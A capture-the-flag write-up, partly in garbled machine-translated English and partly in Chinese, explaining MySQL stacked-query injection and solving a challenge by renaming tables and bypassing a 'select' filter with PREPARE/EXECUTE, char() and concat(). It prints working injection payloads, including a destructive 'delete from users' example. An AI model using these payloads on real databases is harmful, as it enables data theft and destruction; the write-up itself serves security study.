0x01 stack injection study (stacked query, Stacked Queries)
Stack injection provides a lot of control over the attacker, and is limited to the SELECT statement UNION joint inquiry different attacks, the stack can be used to perform inject any SQL statement.
Stack injection principle
In sql, the semicolon indicates the end of a statement. If we add a statement after the semicolon, this statement can be executed, continue to add a semicolon and a statement, so that you can execute multiple statements in a call to a database.
For example attack stacked injection
When executing a query, the query execution information first statement, the second statement will list all the contents of the user to delete.
mysql> select * from users where id =1;delete from users;
Stacked injected limitations
Stack injection may not be available in each case. Most of the time, because they do not support the API or database engine, a stack injection can not be achieved.
0x02 Method a: Rename stack injection +
1. Discover can use the table or check out all the data, but we need not flag
2. look at the name of the library, found that many functions are filtered. Because select is filtered, union queries will be irrelevant.
3. Try stack injection, and she can put all gave the name of the library to check out
4. OK to continue name look-up table
See Table 5. The structure can be found in the flag table `1919810931114514`
0';desc `1919810931114514`;#
Note: the windows system, the anti-single quote ( ') is a database, tables, indexes, and column aliases using a reference symbol
eg. mysql> SELECT * FROM `table` WHERE `id` = '123' ;
1919810931114514必须用反单引号括起来,但是words不需要,应该是和数据类型有关
6. 再查看words表的结构,发现一共有id和data两列。
0';desc words;#
那么可以猜测我们提交查询的窗口就是在这个表里查询数据的
7. 那么查询语句很有可能是 : selsect id,data from words where id =
因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1' or 1=1#爆出表所有内容就可以查flag啦
payload:
0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#
8. 再用一下一开始的操作id=1' or 1=1#
0x03 方法二:预处理语句+堆叠注入
预处理语句使用方式:
PREPARE name from '[my sql sequece]'; //预定义SQL语句 EXECUTE name; //执行预定义SQL语句 (DEALLOCATE || DROP) PREPARE name; //删除预定义SQL 语句
预定义语句也可以通过变量进行传递:
SET @tn = 'hahaha'; //存储表名
SET @sql = concat('select * from ', @tn); //存储SQL语句
PREPARE name from @sql; //预定义SQL语句
EXECUTE name; //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla; //删除预定义SQL语句
本题即可利用 char() 函数将select的ASCII码转换为select字符串,接着利用concat()函数进行拼接得到select查询语句,从而绕过过滤。或者直接用concat()函数拼接select来绕过。
char(115,101,108,101,99,116)<----->'select'
payload1:不使用变量
1';PREPARE hacker from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE hacker;#
payload2:使用变量
1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE hacker from @sqli;EXECUTE hacker;#
payload3:只是用contact(),不使用char()
1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#
直接输入这三个payload的任何一个都能获得flag
参考文章:
https://www.sqlinjection.net/stacked-queries/
https://www.jianshu.com/p/36f0772f5ce8